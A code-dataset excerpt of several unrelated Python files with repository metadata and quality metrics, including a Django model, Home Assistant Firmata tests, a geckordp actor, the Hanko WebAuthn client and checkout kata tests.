Filter configurations such that it matches configurations that have an attribute with a value that is not equal to the value that NotEq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.ne)
def op_as_str(self): return "!="
class Eq(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that equals to the value that Eq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.eq)
def op_as_str(self): return "="
| 30.62963 | 159 | 0.627328 | 1,025 | 8,270 | 4.950244 | 0.160976 | 0.026015 | 0.04119 | 0.045723 | 0.650966 | 0.628892 | 0.604454 | 0.568388 | 0.515175 | 0.493496 | 0 | 0.001352 | 0.284764 | 8,270 | 269 | 160 | 30.743494 | 0.856467 | 0.484401 | 0 | 0.369048 | 0 | 0 | 0.064034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.309524 | false | 0 | 0.02381 | 0.083333 | 0.607143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
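The `attribute_filter` row above composes filters with `&` and `|` and matches them against a layer's configuration dict. A condensed, self-contained sketch of the same matching logic (the `eq`/`gt` helpers are illustrative shorthands for the `Eq`/`Greater` classes in the file):

```python
import operator
from typing import Any, Callable, Dict


class AttributeFilter:
    """Minimal re-implementation of the matching logic above, for illustration."""

    def __init__(self, attr: str, value: Any, op: Callable):
        self.attr, self.value, self.op = attr, value, op

    def match(self, layer_config: Dict[str, Any]) -> bool:
        # A missing attribute never matches; otherwise apply the bound operator.
        if self.attr in layer_config:
            return self.op(layer_config.get(self.attr), self.value)
        return False

    def __and__(self, other):
        return AndAttributeFilter(self, other)


class AndAttributeFilter:
    """Logical AND over several filters, as in the source's AndAttributeFilter."""

    def __init__(self, *filters):
        self.filters = filters

    def match(self, layer_config: Dict[str, Any]) -> bool:
        return all(f.match(layer_config) for f in self.filters)


def eq(attr, value):
    return AttributeFilter(attr, value, operator.eq)


def gt(attr, value):
    return AttributeFilter(attr, value, operator.gt)


combined = eq("kernel_size", 3) & gt("filters", 64)
print(combined.match({"kernel_size": 3, "filters": 128}))  # → True
print(combined.match({"kernel_size": 3, "filters": 32}))   # → False
```

Binding a comparison from the `operator` module per subclass keeps each concrete filter (`Eq`, `Greater`, `SmallerEq`, ...) down to a constructor and a display string.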
91bdc573b37fa9d1295d9a5362b369a4418186c6 | 359 | py | Python | backend/apps/currency/models.py | jorgejimenez98/backend-evaluacion-desempenno | 08975303952608809375c5e2185bf20a84cc0f4e | [
"MIT"
] | null | null | null | backend/apps/currency/models.py | jorgejimenez98/backend-evaluacion-desempenno | 08975303952608809375c5e2185bf20a84cc0f4e | [
"MIT"
] | null | null | null | backend/apps/currency/models.py | jorgejimenez98/backend-evaluacion-desempenno | 08975303952608809375c5e2185bf20a84cc0f4e | [
"MIT"
] | null | null | null | from django.db import models
class Currency(models.Model):
id = models.IntegerField(primary_key=True) # id_moneda
acronym = models.CharField(max_length=218) # cod_mone
description = models.CharField(max_length=218) # desc_mone
active = models.BooleanField() # activo
def __str__(self):
return f'Currency {self.description}'
| 29.916667 | 63 | 0.715877 | 45 | 359 | 5.488889 | 0.688889 | 0.121457 | 0.145749 | 0.194332 | 0.218623 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020478 | 0.183844 | 359 | 11 | 64 | 32.636364 | 0.822526 | 0.097493 | 0 | 0 | 0 | 0 | 0.08464 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.125 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
91c3458625a3b5858b98d457edd962749cf9c352 | 130 | py | Python | Python/map-reduce/map.py | zhangymPerson/Script_Test | fb8b8a339dddcb5650181ed9bded481a7229e2bb | [
"Apache-2.0"
] | null | null | null | Python/map-reduce/map.py | zhangymPerson/Script_Test | fb8b8a339dddcb5650181ed9bded481a7229e2bb | [
"Apache-2.0"
] | null | null | null | Python/map-reduce/map.py | zhangymPerson/Script_Test | fb8b8a339dddcb5650181ed9bded481a7229e2bb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
import sys
print("beginning ...")
for word in sys.stdin:
    ss = word.split(" ")
    for w in ss:
        print(w)
| 9.285714 | 22 | 0.607692 | 22 | 130 | 3.590909 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246154 | 130 | 13 | 23 | 10 | 0.806122 | 0.146154 | 0 | 0 | 0 | 0 | 0.122642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
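The mapper above can be exercised without a Hadoop streaming pipeline by feeding it an in-memory stream — a minimal sketch, assuming whitespace-delimited input (the sample text is illustrative):

```python
import io

def map_words(stream):
    # Emit each whitespace-separated token, mapper-style.
    tokens = []
    for line in stream:
        for w in line.split():
            tokens.append(w)
    return tokens

# Simulate piping two lines of text into the mapper.
tokens = map_words(io.StringIO("hello world\nfoo bar"))
print(tokens)  # → ['hello', 'world', 'foo', 'bar']
```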
91d54127d5b551e1a51e340f461bf9369c8b43db | 1,140 | py | Python | geckordp/actors/accessibility/accessible.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-12-24T04:37:02.000Z | 2021-12-24T04:37:02.000Z | geckordp/actors/accessibility/accessible.py | jpramosi/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-07-23T13:38:36.000Z | 2021-08-07T14:17:54.000Z | geckordp/actors/accessibility/accessible.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-10-31T17:31:35.000Z | 2021-10-31T17:31:35.000Z | from geckordp.actors.actor import Actor
class AccessibleActor(Actor):
""" https://github.com/mozilla/gecko-dev/blob/master/devtools/shared/specs/accessibility.js#L46
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def audit(self, options: dict = None):
if (options is None):
options = {}
return self.client.send_receive({
"to": self.actor_id,
"type": "audit",
"options": options,
})
def children(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "children",
}, "children")
def get_relations(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "getRelations",
}, "relations")
def hydrate(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "hydrate",
}, "properties")
def snapshot(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "snapshot",
}, "snapshot")
| 26.511628 | 99 | 0.539474 | 117 | 1,140 | 5.094017 | 0.401709 | 0.083893 | 0.134228 | 0.167785 | 0.395973 | 0.395973 | 0.395973 | 0.395973 | 0.395973 | 0.395973 | 0 | 0.002554 | 0.313158 | 1,140 | 42 | 100 | 27.142857 | 0.758621 | 0.079825 | 0 | 0.3125 | 0 | 0 | 0.108004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.03125 | 0.125 | 0.40625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
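Each method of `AccessibleActor` builds a small message dict for `client.send_receive`. A self-contained sketch of the payload an `audit()` call produces, assuming a hypothetical actor id:

```python
def build_audit_message(actor_id, options=None):
    # Mirrors the dict AccessibleActor.audit() sends to the client.
    if options is None:
        options = {}
    return {"to": actor_id, "type": "audit", "options": options}

# "server1.conn0.accessible42" is an invented example id.
msg = build_audit_message("server1.conn0.accessible42")
print(msg["type"])  # → audit
```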
91db94052cc4ac22420e01f870977469d87acbb9 | 3,391 | py | Python | tests/components/firmata/test_config_flow.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | tests/components/firmata/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | tests/components/firmata/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Test the Firmata config flow."""
from unittest.mock import patch
from pymata_express.pymata_express_serial import serial
from homeassistant import config_entries, setup
from homeassistant.components.firmata.const import CONF_SERIAL_PORT, DOMAIN
from homeassistant.const import CONF_NAME
from homeassistant.core import HomeAssistant
async def test_import_cannot_connect_pymata(hass: HomeAssistant) -> None:
"""Test we fail with an invalid board."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress.start_aio",
side_effect=RuntimeError,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import_cannot_connect_serial(hass: HomeAssistant) -> None:
"""Test we fail with an invalid board."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress.start_aio",
side_effect=serial.serialutil.SerialException,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import_cannot_connect_serial_timeout(hass: HomeAssistant) -> None:
"""Test we fail with an invalid board."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress.start_aio",
side_effect=serial.serialutil.SerialTimeoutException,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import(hass: HomeAssistant) -> None:
"""Test we create an entry from config."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress", autospec=True
), patch(
"homeassistant.components.firmata.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.firmata.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "create_entry"
assert result["title"] == "serial-/dev/nonExistent"
assert result["data"] == {
CONF_NAME: "serial-/dev/nonExistent",
CONF_SERIAL_PORT: "/dev/nonExistent",
}
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
| 36.462366 | 81 | 0.676792 | 374 | 3,391 | 5.906417 | 0.197861 | 0.052965 | 0.095066 | 0.095066 | 0.74287 | 0.717972 | 0.639656 | 0.639656 | 0.639656 | 0.639656 | 0 | 0.000749 | 0.212622 | 3,391 | 92 | 82 | 36.858696 | 0.826592 | 0.008552 | 0 | 0.529412 | 0 | 0 | 0.21498 | 0.147289 | 0 | 0 | 0 | 0 | 0.161765 | 1 | 0 | false | 0 | 0.205882 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
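The tests above rely on `patch(..., side_effect=...)` to make the patched callable raise instead of returning. A minimal, self-contained illustration of the same idiom (patching a stdlib function here purely as a stand-in):

```python
from unittest.mock import patch
import os.path

# While the patch is active, os.path.exists raises the given exception,
# just as the patched PymataExpress.start_aio does in the tests above.
with patch("os.path.exists", side_effect=RuntimeError("boom")):
    try:
        os.path.exists("/tmp")
        result = "ok"
    except RuntimeError:
        result = "cannot_connect"
print(result)  # → cannot_connect
```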
91e736ee7fc3926690b4de561f1c73a66f3ce173 | 827 | py | Python | my_studyguide/math1.py | worldwidekatie/study_guide | bc7a67f331990d07463c6ac9413eef283e555ad0 | [
"MIT"
] | null | null | null | my_studyguide/math1.py | worldwidekatie/study_guide | bc7a67f331990d07463c6ac9413eef283e555ad0 | [
"MIT"
] | null | null | null | my_studyguide/math1.py | worldwidekatie/study_guide | bc7a67f331990d07463c6ac9413eef283e555ad0 | [
"MIT"
] | null | null | null |
class Math1():
def __init__(self):
self.my_num1 = 10
self.my_num2 = 20
def addition(self):
return self.my_num1 + self.my_num2
def subtraction(self):
return self.my_num1 - self.my_num2
class Math_Plus(Math1):
def __init__(self, my_num1=40, my_num2=90):
self.my_num1 = my_num1
self.my_num2 = my_num2
def multiplication(self):
return self.my_num1 * self.my_num2
def division(self):
return self.my_num1 / self.my_num2
if __name__ == "__main__":
math1 = Math1()
print(math1.addition()) #30
print(math1.subtraction()) #-10
math_plus = Math_Plus()
print(math_plus.addition()) #130
print(math_plus.subtraction()) #-50
print(math_plus.multiplication()) #3600
print(math_plus.division()) #0.4444444444444444 | 21.763158 | 47 | 0.633615 | 114 | 827 | 4.254386 | 0.254386 | 0.160825 | 0.14433 | 0.123711 | 0.292784 | 0.259794 | 0.259794 | 0.259794 | 0.136082 | 0 | 0 | 0.083467 | 0.246675 | 827 | 38 | 48 | 21.763158 | 0.695024 | 0.031439 | 0 | 0 | 0 | 0 | 0.010076 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0 | 0.16 | 0.48 | 0.24 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
37cf3d15f9cd1cb5484c999c6e3976d53be87251 | 14,805 | py | Python | src/hanko_sdk/client.py | teamhanko/hanko-python | 2455861b6edc3c393dde7ed62635f96c88b1350f | [
"Apache-2.0"
] | 1 | 2022-03-08T06:38:22.000Z | 2022-03-08T06:38:22.000Z | src/hanko_sdk/client.py | teamhanko/hanko-python | 2455861b6edc3c393dde7ed62635f96c88b1350f | [
"Apache-2.0"
] | null | null | null | src/hanko_sdk/client.py | teamhanko/hanko-python | 2455861b6edc3c393dde7ed62635f96c88b1350f | [
"Apache-2.0"
] | null | null | null | from abc import ABC, abstractmethod
from enum import Enum
from typing import Type, Optional, List
from requests import Request, Session, PreparedRequest
from . import json_serializer
from .auth import HankoAuth
from .config import HankoHttpClientConfig
import logging
from .exceptions.hanko_exceptions import HankoAuthenticationException, HankoNotFoundException, HankoUnexpectedException
from .models.authentication_finalization import AuthenticationFinalizationRequest, AuthenticationFinalizationResponse
from .models.authentication_initialization import AuthenticationInitializationRequest, \
AuthenticationInitializationResponse
from .models.base_model import BaseModel
from .models.core import Credential
from .models.core import CredentialList
from .models.credential_query import CredentialQuery
from .models.credential_update import CredentialUpdateRequest
from .models.registration_finalization import RegistrationFinalizationRequest, RegistrationFinalizationResponse
from .models.registration_initialization import RegistrationInitializationRequest, RegistrationInitializationResponse
from .models.transaction_finalization import TransactionFinalizationRequest, TransactionFinalizationResponse
from .models.transaction_initialization import TransactionInitializationRequest, TransactionInitializationResponse
from .utils import url_utils
class BaseHankoClient(ABC):
""" Defines the Hanko API interface. """
@abstractmethod
def initialize_registration(self, request: RegistrationInitializationRequest) -> RegistrationInitializationResponse:
""" Initializes the registration of a new credential using a :py:class:`RegistrationInitializationRequest`.
On successful initialization, the Hanko Authentication API returns a
:py:class:`RegistrationInitializationResponse`. Send the response to your client application in order to
pass it to the browser's WebAuthn API's ``navigator.credentials.create()`` function.
:param request: The RegistrationInitializationRequest.
:return: A RegistrationInitializationResponse object.
"""
pass
@abstractmethod
def finalize_registration(self, request: RegistrationFinalizationRequest) -> RegistrationFinalizationResponse:
""" Finalizes the registration request initiated by ``initialize_registration``. Provide a
:py:class:`RegistrationFinalizationRequest` which represents the result of calling the browser's WebAuthn API's
``navigator.credentials.create()`` function.
:param request: The RegistrationFinalizationRequest.
:return: A RegistrationFinalizationResponse. """
pass
@abstractmethod
def initialize_authentication(self, request: AuthenticationInitializationRequest) -> AuthenticationInitializationResponse:
""" Initializes an authentication with a registered credential using an
:py:class:`AuthenticationInitializationRequest`. On successful initialization, the Hanko Authentication API
returns an :py:class:`AuthenticationInitializationResponse`. Send the response to your client application in
order to pass it to the browser's WebAuthn API's ``navigator.credentials.get()`` function.
:param request: The AuthenticationInitializationRequest.
:return: An AuthenticationInitializationResponse. """
pass
@abstractmethod
def finalize_authentication(self, request: AuthenticationFinalizationRequest) -> AuthenticationFinalizationResponse:
""" Finalizes the authentication request initiated by ``initialize_authentication``. Provide
an :py:class:`AuthenticationFinalizationRequest` which represents the result of calling the browser's
WebAuthn API's ``navigator.credentials.get()`` function.
:param request: The AuthenticationFinalizationRequest.
:return: An AuthenticationFinalizationResponse. """
pass
@abstractmethod
def initialize_transaction(self, request: TransactionInitializationRequest) -> TransactionInitializationResponse:
""" Initiates a transaction. A transaction operation is analogous to the authentication operation,
with the main difference being that a transaction context must be provided in the form of a string.
This value will become part of the challenge an authenticator signs over during the operation.
Initialize a transaction using a :py:class:`TransactionInitializationRequest`. On successful initialization,
the Hanko Authentication API returns a :py:class:`TransactionInitializationResponse`. Send the response to
your client application in order to pass it to the browser's WebAuthn API's
``navigator.credentials.get()`` function.
:param request: The TransactionInitializationRequest.
:return: A TransactionInitializationResponse. """
pass
@abstractmethod
def finalize_transaction(self, request: TransactionFinalizationRequest) -> TransactionFinalizationResponse:
""" Finalizes the transaction request initiated by ``initialize_transaction``. Provide a
:py:class:`TransactionFinalizationRequest` which represents the result of calling the browser's WebAuthn
API's ``navigator.credentials.get()`` function.
:param request: The TransactionFinalizationRequest.
:return: A TransactionFinalizationResponse. """
pass
@abstractmethod
def list_credentials(self, credential_query: CredentialQuery) -> List[Credential]:
""" Returns a list of :py:class:`Credential`. Filter by ``user_id`` and paginate results using a
:py:class:`CredentialQuery`. The value for ``page_size`` defaults to ``10`` and the value for
``page`` to ``1``.
:param credential_query: The CredentialQuery.
:return: A list of Credential objects. """
pass
@abstractmethod
def get_credential(self, credential_id: str) -> Credential:
""" Returns the :py:class:`Credential` with the specified ``credential_id``.
:param credential_id: The id of the Credential to retrieve.
:return: The Credential. """
pass
@abstractmethod
def delete_credential(self, credential_id: str):
""" Deletes the :py:class:`Credential` with the specified ``credential_id``.
:param credential_id: The id of the credential to delete. """
pass
@abstractmethod
def update_credential(self, credential_id: str, request: CredentialUpdateRequest) -> Credential:
""" Updates the :py:class:`Credential` with the specified ``credential_id``. Provide a
:py:class:`CredentialUpdateRequest` with the updated data. Currently, you can only update the name of a
:py:class:`Credential`.
:param credential_id: The id of the Credential to update.
:param request: The CredentialUpdateRequest.
:return: The updated Credential. """
pass
class RequestMethod(Enum):
GET = "GET"
POST = "POST"
PUT = "PUT"
DELETE = "DELETE"
class HankoHttpClient(BaseHankoClient):
""" A HTTP implementation of :py:class:`BaseHankoClient`. """
PATH_WEBAUTHN_BASE = "webauthn"
PATH_REGISTRATION_INITIALIZE = "registration/initialize"
PATH_REGISTRATION_FINALIZE = "registration/finalize"
PATH_AUTHENTICATION_INITIALIZE = "authentication/initialize"
PATH_AUTHENTICATION_FINALIZE = "authentication/finalize"
PATH_TRANSACTION_INITIALIZE = "transaction/initialize"
PATH_TRANSACTION_FINALIZE = "transaction/finalize"
PATH_CREDENTIALS = "credentials"
def __init__(self, config: HankoHttpClientConfig, logger: logging.Logger = None):
""" Constructs a :py:class:`HankoHttpClient`.
:param config: A Hanko configuration.
:param logger: An optional Logger object. """
self.__config = config
self.__logger = logger
self.__session = Session()
def __del__(self):
if self.__session is not None:
self.__session.close()
def __build_url(self, path: str) -> str:
""" Builds an absolute Hanko API URL.
:param path: The API endpoint path.
:return: An absolute Hanko API URL. """
return url_utils.build_url(self.__config.base_url, self.__config.api_version, HankoHttpClient.PATH_WEBAUTHN_BASE, path)
def __prepare_request(self, request_path: str, method: RequestMethod, body: Optional[BaseModel], query_parameters: Optional[dict]) -> PreparedRequest:
""" Creates and prepares a :py:class:`Request` object with the given parameters.
:param request_path: The API endpoint path.
:param method: The HTTP method to use for the request.
:param body: The request body.
:param query_parameters: The query parameters.
:return: A PreparedRequest. """
url = self.__build_url(request_path)
body_json = None
if body is not None:
body_json = json_serializer.serialize(body)
request = Request(method.value, url, data=body_json, auth=HankoAuth(self.__config, url_utils.remove_base(url, self.__config.base_url)), params=query_parameters)
return request.prepare()
def __log_request(self, request: PreparedRequest):
""" Logs the request parameter using the ``logger``.
:param request: The request to be logged. """
if self.__logger is not None:
self.__logger.info("-- BEGIN Hanko API Request --")
self.__logger.info("request method: %s", request.method)
self.__logger.info("request URL: %s", request.path_url)
self.__logger.info("authorization: %s", request.headers.get("Authorization", "none"))
self.__logger.info("body: %s", request.body)
self.__logger.info("-- END Hanko API Request --")
def __make_request(self, request_path: str, method: RequestMethod, body: Optional[BaseModel], query_parameters: Optional[dict], response_type: Optional[Type[BaseModel]]):
""" Performs a HTTP request to the Hanko API with the given body and query parameters. Returns and deserializes
the response as the given type ``response_type``.
The body, if not null, is serialized to a JSON string using the ``json_serializer`` module.
The query_parameters parameter, also optional, is used to build the request query parameters.
:param request_path: The API endpoint path.
:param method: The HTTP method to use for the request.
:param body: The request body.
:param query_parameters: The query parameters.
:param response_type: The type the API response to be deserialized as.
:return: The response body, deserialized as response_type. """
request = self.__prepare_request(request_path, method, body, query_parameters)
self.__log_request(request)
response = self.__session.send(request)
if response.ok:
if response_type is not None and response.text is not None and len(response.text) > 0:
response_object = json_serializer.deserialize_string(response.text, response_type)
return response_object
else:
return None
if response.status_code == 401:
raise HankoAuthenticationException(response.text, response.status_code, request.path_url)
elif response.status_code == 404:
raise HankoNotFoundException(response.text, response.status_code, request.path_url)
raise HankoUnexpectedException(response.text, response.status_code, request.path_url)
def initialize_registration(self, request: RegistrationInitializationRequest) -> RegistrationInitializationResponse:
response = self.__make_request(HankoHttpClient.PATH_REGISTRATION_INITIALIZE, RequestMethod.POST, request, None, RegistrationInitializationResponse)
return response
def finalize_registration(self, request: RegistrationFinalizationRequest) -> RegistrationFinalizationResponse:
response = self.__make_request(HankoHttpClient.PATH_REGISTRATION_FINALIZE, RequestMethod.POST, request, None, RegistrationFinalizationResponse)
return response
def initialize_authentication(self, request: AuthenticationInitializationRequest) -> AuthenticationInitializationResponse:
response = self.__make_request(HankoHttpClient.PATH_AUTHENTICATION_INITIALIZE, RequestMethod.POST, request, None, AuthenticationInitializationResponse)
return response
def finalize_authentication(self, request: AuthenticationFinalizationRequest) -> AuthenticationFinalizationResponse:
response = self.__make_request(HankoHttpClient.PATH_AUTHENTICATION_FINALIZE, RequestMethod.POST, request, None, AuthenticationFinalizationResponse)
return response
def initialize_transaction(self, request: TransactionInitializationRequest) -> TransactionInitializationResponse:
response = self.__make_request(HankoHttpClient.PATH_TRANSACTION_INITIALIZE, RequestMethod.POST, request, None, TransactionInitializationResponse)
return response
def finalize_transaction(self, request: TransactionFinalizationRequest) -> TransactionFinalizationResponse:
response = self.__make_request(HankoHttpClient.PATH_TRANSACTION_FINALIZE, RequestMethod.POST, request, None, TransactionFinalizationResponse)
return response
def list_credentials(self, credential_query: CredentialQuery) -> List[Credential]:
query_parameters = credential_query.to_json_serializable() if credential_query is not None else {}
response: CredentialList = self.__make_request(HankoHttpClient.PATH_CREDENTIALS, RequestMethod.GET, None, query_parameters, CredentialList)
return response.credentials if response is not None else []
def get_credential(self, credential_id: str) -> Credential:
path = "{}/{}".format(HankoHttpClient.PATH_CREDENTIALS, credential_id)
response = self.__make_request(path, RequestMethod.GET, None, None, Credential)
return response
def delete_credential(self, credential_id: str):
path = "{}/{}".format(HankoHttpClient.PATH_CREDENTIALS, credential_id)
self.__make_request(path, RequestMethod.DELETE, None, None, None)
def update_credential(self, credential_id: str, request: CredentialUpdateRequest) -> Credential:
path = "{}/{}".format(HankoHttpClient.PATH_CREDENTIALS, credential_id)
response = self.__make_request(path, RequestMethod.PUT, request, None, Credential)
return response
| 51.40625 | 174 | 0.7282 | 1,477 | 14,805 | 7.142857 | 0.150305 | 0.012607 | 0.008341 | 0.017441 | 0.413744 | 0.376588 | 0.37346 | 0.215545 | 0.189953 | 0.169194 | 0 | 0.000841 | 0.196893 | 14,805 | 287 | 175 | 51.585366 | 0.886459 | 0.338129 | 0 | 0.366906 | 0 | 0 | 0.035196 | 0.012737 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18705 | false | 0.071942 | 0.151079 | 0 | 0.539568 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
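`__build_url` delegates to `url_utils.build_url` to join the base URL, API version, `webauthn` segment, and endpoint path. The real `url_utils` source is not shown here, but a sketch of the URL layout the client presumably produces (base URL and version are hypothetical values):

```python
def build_url(base, version, *parts):
    # Join base URL, API version, and path segments with single slashes.
    return "/".join([base.rstrip("/"), version, *parts])

url = build_url("https://api.example.com", "v1",
                "webauthn", "registration/initialize")
print(url)  # → https://api.example.com/v1/webauthn/registration/initialize
```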
37d53d6476d58a9b26178ba2961b262e7af95e51 | 1,450 | py | Python | test/solution_tests/CHK/test_round_4.py | DPNT-Sourcecode/CHK-anrv01 | 84ff4fb65a416c87f0f18a76fec14bf525c81196 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/CHK/test_round_4.py | DPNT-Sourcecode/CHK-anrv01 | 84ff4fb65a416c87f0f18a76fec14bf525c81196 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/CHK/test_round_4.py | DPNT-Sourcecode/CHK-anrv01 | 84ff4fb65a416c87f0f18a76fec14bf525c81196 | [
"Apache-2.0"
] | null | null | null | import json
from lib.solutions.CHK.checkout_solution import checkout
import string
import importlib.resources
class Test:
def test_k_functionality(self):
input_skus = "KK"
total_value = checkout(input_skus)
assert total_value == 120
def test_n_functionality(self):
input_skus = "NNNM"
total_value = checkout(input_skus)
assert total_value == 120
def test_p_functionality(self):
input_skus = "PPPPP"
total_value = checkout(input_skus)
assert total_value == 200
def test_q_functionality(self):
input_skus = "QQQQQQ"
total_value = checkout(input_skus)
assert total_value == 160
def test_r_functionality(self):
input_skus = "RRRQ"
total_value = checkout(input_skus)
assert total_value == 150
def test_u_functionality(self):
input_skus = "UUUU"
total_value = checkout(input_skus)
assert total_value == 120
def test_v_functionality(self):
input_skus = "VVV"
total_value = checkout(input_skus)
assert total_value == 130
def test_each_sku_added(self):
with importlib.resources.open_text("lib.solutions.CHK.sku_data", "sku_items_and_prices.json") as sku_data:
sku_values = json.load(sku_data)
for char in string.ascii_uppercase:
total_value = checkout(char)
assert total_value == sku_values[char]
| 29 | 114 | 0.661379 | 182 | 1,450 | 4.950549 | 0.318681 | 0.17758 | 0.159822 | 0.201998 | 0.36737 | 0.36737 | 0.36737 | 0.36737 | 0.176471 | 0.176471 | 0 | 0.019608 | 0.261379 | 1,450 | 49 | 115 | 29.591837 | 0.821662 | 0 | 0 | 0.25641 | 0 | 0 | 0.054483 | 0.035172 | 0 | 0 | 0 | 0 | 0.205128 | 1 | 0.205128 | false | 0 | 0.128205 | 0 | 0.358974 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
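The assertions above (e.g. `"KK"` totalling 120) imply multi-buy offers on top of unit prices. The `checkout_solution` source is not shown, but a generic sketch of that pricing scheme — the unit price and offer below are illustrative assumptions, not the kata's real price table:

```python
def checkout(skus, prices, offers):
    # Apply each SKU's multi-buy offer first, then charge unit price
    # for the remainder.
    total = 0
    for sku in set(skus):
        count = skus.count(sku)
        if sku in offers:
            qty, offer_price = offers[sku]
            total += (count // qty) * offer_price
            count %= qty
        total += count * prices[sku]
    return total

print(checkout("KK", {"K": 70}, {"K": (2, 120)}))  # → 120
```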
